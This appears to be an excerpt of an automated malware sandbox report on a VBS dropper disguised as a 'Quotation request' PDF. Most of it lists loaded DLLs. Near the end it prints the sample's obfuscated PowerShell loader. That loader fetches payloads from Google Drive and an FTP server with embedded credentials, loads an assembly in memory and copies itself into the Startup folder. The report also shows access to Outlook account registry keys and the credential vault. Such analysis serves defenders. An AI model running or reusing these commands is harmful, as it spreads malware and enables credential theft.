                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: pstorec.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: Binary string: F:\Source Coder Vb.net C#\crc crypter\Source code UpCry\Metodo DF\ClassLibrary3\ClassLibrary3\obj\Release\ClassLibrary3.pdb source: powershell.exe, 00000004.00000002.2230575334.000001D62B2FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2230575334.000001D629F5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3038298129.000001D6423B0000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' +", "0", "false");
                    Source: 13.2.powershell.exe.21a8030f208.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 13.2.powershell.exe.21af4520000.2.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 19.2.powershell.exe.1f1e6baf640.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: 25.2.powershell.exe.1650030d8e0.0.raw.unpack, -.cs.Net Code: gr6bLqNKA2Mf7CYjeeS System.Reflection.Assembly.Load(byte[])
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvAHIAZQ' + [char]66 + '0AHAAeQ' + [char]66 + 'yAGMAcA' + [char]66 + 'VAC8A
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHMAaQ' + [char]66 + 'tAG8Abg' + [char]66 + 'hAHMAdA' + [char]66 + 'vAGwAZQ' + [char]66 + 'yAGMAaQ' + [char]66 + '1AGMALg' + [char]66 + 'yAG8ALw' + [char]66 + 'pAG0AYQ' + [char]66 + 'nAGUAcwAvAHMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAC4AdA' + [char]66 + '4AHQAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgACgAZA' + [char]66 + 'vAGgAdA' + [char]66 + 'lAE0AdA' + [char]66 + 'lAEcALgApACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAKA' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAHQAZQ' + [char]66 + 'HAC4AKQAgAFoAYw' + [char]66 + 'CAGMAYQAkACAAKA' + [char]66 + 'kAGEAbw' + [char]66 + 'MAC4Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAdA' + [char]66 + 'uAGUAcg' + [char]66 + 'yAHUAQwA6ADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwApACAAKQAgACcAQQAnACAALAAgACcAkyE6AJMhJwAgACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAUgAuAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TADQANg' + [char]66 + 'lAHMAYQ' + [char]66 + 'CAG0Abw' + [char]66 + 'yAEYAOgA6AF0AdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIA' + [char]66 + 'dAF0AWw' + [char]66 + 'lAHQAeQ' + [char]66 + 'CAFsAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'YAFAAVQ' + [char]66 + '1AGgAJAA7ACkAIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '0AHoAdg' + [char]66 + 'rAHEAJAA7ACkAKA' + [char]66 + 'lAHMAbw' + [char]66 + 'wAHMAaQ' + [char]66 + 'kAC4AdA' + [char]66 + '6AHYAaw' + [char]66 + 'xACQAOwApACAAJw' + [char]
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$xglvh = (New-Object Net.WebClient);$xglvh.Encoding = [System.Text.Encoding]::UTF8;$xglvh.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$qkvzt.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $qkvzt.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$qkvzt.dispose();$qkvzt = (New-Object Net.WebClient);$qkvzt.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $qkvzt.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\Quotation request YN2024-10-07pdf.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' , 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.revres/segami/or.cuicrelotsanomis//:sptth' , $huUPX , 'D D1D' ) );};"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\nliem.ps1' ";exit
